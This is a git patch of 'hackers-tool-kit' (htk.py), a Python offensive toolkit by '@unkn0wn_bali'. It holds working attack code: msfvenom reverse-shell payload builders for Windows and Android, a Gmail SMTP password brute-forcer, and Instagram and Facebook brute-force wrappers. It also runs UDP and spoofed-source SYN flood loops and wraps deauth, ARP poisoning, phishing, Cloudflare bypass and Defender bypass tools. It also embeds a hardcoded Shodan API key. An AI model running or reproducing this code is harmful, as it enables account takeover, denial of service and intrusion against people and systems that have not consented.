{0}.exe\n" >> winbyp.rc'.format(name)) - os.system('echo "run\n" >> winbyp.rc') - os.system("service postgresql restart") - os.system('msfconsole -r winbyp.rc') - os.system('rm -rf winbyp.rc') -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> exploit.rc'.format(f)) - os.system('echo "show options\n" >> exploit.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r exploit.rc') - os.system('rm -rf exploit.rc') -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -def datalist(): - os.system('echo "hosts\n" >> data.rc') - os.system('echo "services\n" >> data.rc') - os.system("service postgresql restart") - os.system('msfconsole -r data.rc') - os.system('rm -rf data.rc') -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -def upgrade(): - os.system("apt update && apt upgrade") -def nscript(): - os.system("cat /root/hackers-tool-kit/tools/scripts.txt") - print "\n" - j = raw_input(G+"Select Script:\033[0m ") - k = raw_input(G+"Target:\033[0m ") - a = 'nmap --script {0} {1}'.format(j,k) - os.system(a) -def sshver(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - b = raw_input(G+"Timeout: \033[0m") - os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') - os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) - os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) - os.system('echo "show options\n" >> sshver.rc') - os.system('echo "run\n" >> sshver.rc') - os.system("service postgresql restart") - os.system('msfconsole -r sshver.rc') - os.system('rm -rf sshver.rc') -def chains(): - h = raw_input("Enter Browser: ") - j = raw_input("Enter Website: ") - a = 'proxychains {0} {1}'.format(h,j) - os.system(a) -def mysqlv(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') - os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) - os.system('echo "show options\n" >> mysqlv.rc') - os.system('echo "run\n" >> mysqlv.rc') - os.system("service postgresql restart") - os.system('msfconsole -r mysqlv.rc') - os.system('rm -rf mysqlv.rc') -def connect(): - h = raw_input("Enter Host: ") - print "\n" - print " How would you like to connect?" - print "---------------------------------------" - print "ssh: Secure Shell | Default Port = 22" - print "---------------------------------------" - print "telnet: Network Virtual Terminal | Default Port = 23" - print "---------------------------------------" - j = raw_input("Select Protocol: ") - a = '{0} {1}'.format(j,h) - os.system(a) -def main(): - found = False - while not found: - x = raw_input(N+'\033[91m[\033[0mhtk\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - mainbanner() - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit" : - import sys - print "follow \033[92m@unkn0wn_bali\033[0m on instagram" - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arppois": - appois() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - if x == "nscript": - nscript() - if x == "sshver": - sshver() - if x == "chains": - chains() - if x == "mysqlv": - mysqlv() - if x == "connect": - connect() - found = True -mainbanner() -main() From a4a6eadfb2a1a668a7ee634e70a1c2699e4b7332 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 24 Mar 2019 15:11:24 -0400 Subject: [PATCH 059/214] Add files via upload --- htk.py | 2067 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 2067 insertions(+) create mode 100644 htk.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..24aa662 --- /dev/null +++ b/htk.py @@ -0,0 +1,2067 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @unkn0wn_bali +#i do not give you permission to show / edit this script without my credit +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +def mainbanner(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @unkn0wn_bali On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +about : about the creator / me +? : displays this message +clear : clears screen except for banner +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +connect : connect to a host +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal Hackers-Tool-Kit +arppois : ARP poisoning | +sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ +payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ +crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ +traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ +resa : reset account password ██║ ██║ ██║ ██║ ██╗ +resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ +hashid : find the type of hash of a hash | +wafwoof : check a web application for firewall Hackers-Tool-Kit +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +sshver : scan for ssh version on a host +chains : browse web anonymous via proxychains [proxychains setup required] +mysqlv : scan for mysql version on a host +\033[91m---------------------------------------------------------------------------------\033[0m + """ +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + k = raw_input("THREADS> ") + ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) + os.system(ma) +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) +def wifite(): + os.system("wifite") +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +def netdev(): + os.system("netdiscover") +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +def sysinfo(): + os.system("iwconfig") + k = raw_input("Interface: ") + os.system("clear") + os.system("ifconfig") + os.system("iwconfig") + os.system("neofetch") + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + show = 'macchanger -s {0}'.format(k) + os.system(show) +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +def tcp(): + print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" + print "\n" + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" + os.system("sleep 5") + os.system("python /root/hackers-tool-kit/tools/" + tcp) +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() + +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra 